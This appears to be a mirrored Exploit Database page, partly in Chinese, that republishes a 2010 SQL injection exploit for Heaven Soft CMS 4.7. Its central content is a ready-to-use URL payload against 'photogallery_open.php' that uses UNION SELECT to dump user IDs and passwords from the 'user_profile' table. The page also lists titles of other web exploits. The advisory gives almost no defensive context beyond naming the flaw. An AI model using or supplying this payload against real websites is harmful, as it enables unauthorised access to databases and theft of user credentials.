Heaven Soft CMS 4.7 – ‘photogallery_open.php’ SQL Injection

Exploit Database
9 阅读

作者： CoBRa_21

日期： 2010-05-14
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/12608/

-------------------------------------------------------------------------------------------
 
Heaven Soft CMS v 4.7 (photogallery_open.php) SQL Injection Vulnerability
 
-------------------------------------------------------------------------------------------
 
Author: CoBRa_21
 
Mail: uyku_cu@windowslive.com
 
Script Home: http://www.heavensoft.com.pk/

-------------------------------------------------------------------------------------------
 
Sql Injection:
 
http://localhost/[path]/photogallery_open.php?cid=-10%20union%20select%20group_concat%28user_id,0x3a,password%29+from+user_profile--

-------------------------------------------------------------------------------------------

Melekler Bize Aglar , Biz Halimize Guleriz......

last Exploits
Heaven Soft CMS 4.7 – ‘photogallery_open.php’ SQL Injection的更多信息

ManageEngine ServiceDesk Plus 9.1 build 9110 – Directory Traversal：
Open Journal Systems (OJS) 2.3.6 – ‘/lib/pkp/classes/core/String.inc.php?String::stripUnsafeHtml()’ Method Cross-Site Scripting：
SePortal 2.5 – SQL Injection (1)：
Cacti 0.8.7e – SQL Injection：
CSZ CMS 1.2.9 – ‘Multiple’ Blind SQLi(Authenticated)：
News Website Script 2.0.5 – SQL Injection：
SnowFlake CMS 0.9.5 Beta – ‘uid’ SQL Injection：
Skeletonz CMS – Persistent Cross-Site Scripting：